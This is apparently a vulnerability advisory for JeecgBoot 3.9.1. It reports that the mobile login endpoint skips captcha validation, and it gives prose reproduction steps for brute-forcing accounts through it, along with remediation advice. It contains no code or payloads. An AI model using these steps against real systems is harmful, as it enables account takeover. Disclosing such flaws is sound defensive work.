JeecgBoot Authorization Bypass Vulnerability in Mobile Login Endpoint

An authorization bypass vulnerability has been identified in JeecgBoot version 3.9.1, specifically within the mobile login endpoint. The issue arises in the LoginController.java file, where the mLogin endpoint fails to validate captcha requirements, allowing for unauthorized access. This vulnerability can be exploited remotely and is considered to have high complexity, making it difficult to execute. The flaw has been publicly disclosed and could potentially be exploited in the wild.

Impact

The vulnerability allows for unlimited brute-force attacks on user accounts through the mobile login endpoint, bypassing captcha protections. This could lead to rapid account takeover, especially for users with weak passwords.

Reproduction

To reproduce this vulnerability, first verify that the standard login endpoint requires captcha by sending a POST request with a valid username and password. The response will indicate that the captcha is invalid. Next, send a POST request to the mobile login endpoint with the same credentials. This time, the response will confirm a successful login, demonstrating the bypassed captcha. The lack of rate limiting or account lockout can be tested by repeatedly attempting logins through the mobile endpoint, which will not trigger any blocks or delays.

Remediation

To address this vulnerability, it is recommended to add captcha verification to the mobile login endpoint, implement rate limiting and account lockout mechanisms, and consider restricting the endpoint's use via API key or app signature validation.